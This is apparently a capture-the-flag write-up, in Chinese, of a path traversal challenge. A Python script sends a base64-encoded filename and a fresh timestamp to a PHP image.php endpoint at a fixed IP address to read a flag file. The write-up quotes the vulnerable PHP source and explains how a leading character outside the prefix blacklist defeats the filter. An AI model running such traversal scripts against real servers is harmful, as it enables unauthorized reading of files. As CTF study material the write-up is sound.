t是时间戳 f是base64加密后的文件名
import base64
import time
import requests
now_time = str(int(time.time()))
print(now_time)
def get_file(url, file):
bytes_file = file.encode("utf-8")
file = base64.b64encode(bytes_file)
file = file.decode()
print(file)
payload = url + "image.php?t=" + now_time + "&f=" + file
res = requests.get(payload)
#print(res.text)
if res.status_code == 200:
html = res.content.decode('utf-8')
print(html)
return False
if __name__ == '__main__':
url = "http://183.129.189.60:10009/"
file = "t/../../../../../flag"
get_file(url, file)
读一下源码 t/…/…/…/…/…/var/www/html/image.php
<?php
if(!isset($_GET['t']) || !isset($_GET['f'])){
echo "you miss some parameters";
exit();
}
$timestamp = time();
if(abs($_GET['t'] - $timestamp) > 10){
echo "what's your time?";
exit();
}
$file = base64_decode($_GET['f']);
if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
echo 'You are not allowed to do that.';
}
else{
echo file_get_contents('/var/www/html/img/'.$file);
}
?>
这个waf是真没想到,路径前再随便加个不在黑名单的字符+/,多个路径就饶过了,而且gqy.jpg和/gqy.jpg回显相同,因为文件名前拼接了路径file_get_contents(’/var/www/html/img/’.$file); 所以伪协议也没法用